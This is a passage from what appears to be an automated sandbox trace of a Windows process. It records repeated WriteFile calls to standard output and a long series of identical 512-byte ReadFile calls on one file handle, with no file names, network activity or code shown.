GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.648] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.648] GetFileType (hFile=0x50) returned 0x1 [0146.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.648] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.648] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.648] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.648] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.648] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.648] GetFileType (hFile=0x50) returned 0x1 [0146.648] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.648] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.648] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, 
lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile 
(in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 
[0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, 
lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, 
lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: 
lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, 
lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.656] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, 
lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.657] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.658] ReadFile (in: hFile=0x58, 